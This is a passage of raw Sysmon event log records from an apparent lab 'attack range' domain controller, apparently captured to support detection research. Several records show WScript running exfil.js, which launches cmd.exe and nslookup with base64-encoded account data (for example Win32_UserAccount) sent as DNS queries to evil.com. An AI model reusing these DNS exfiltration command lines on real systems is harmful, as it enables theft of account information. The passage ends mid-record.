14:16:13.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-873E-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.795{2E1864BB-17A1-629A-783D-000000005F02}55525392C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-873E-000000005F02}3212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.798{2E1864BB-17AD-629A-873E-000000005F02}3212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsvo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.780{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlndcnc.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.717{2E1864BB-17AD-629A-853E-000000005F02}74127884C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-863E-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-863E-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.695{2E1864BB-17AD-629A-843E-000000005F02}20402864C:\Windows\system32\cmd.exe{2E1864BB-17AD-629A-863E-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.704{2E1864BB-17AD-629A-863E-000000005F02}7392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AD-629A-843E-000000005F02}2040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlndcnc.tmp 2>&1 10341000x8000000000000000195976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.664{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-853E-000000005F02}7412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.664{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AD-629A-853E-000000005F02}7412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.664{2E1864BB-17AD-629A-853E-000000005F02}74127884C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-843E-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.649{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-853E-000000005F02}7412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AD-629A-843E-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-17A1-629A-783D-000000005F02}55522824C:\Windows\System32\WScript.exe{2E1864BB-17AD-629A-843E-000000005F02}2040C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.633{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.634{2E1864BB-17AD-629A-843E-000000005F02}2040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlndcnc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.617{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfitlsb.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-17AD-629A-823E-000000005F02}11327376C:\Windows\system32\conhost.exe{2E1864BB-17AD-629A-833E-000000005F02}1276C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+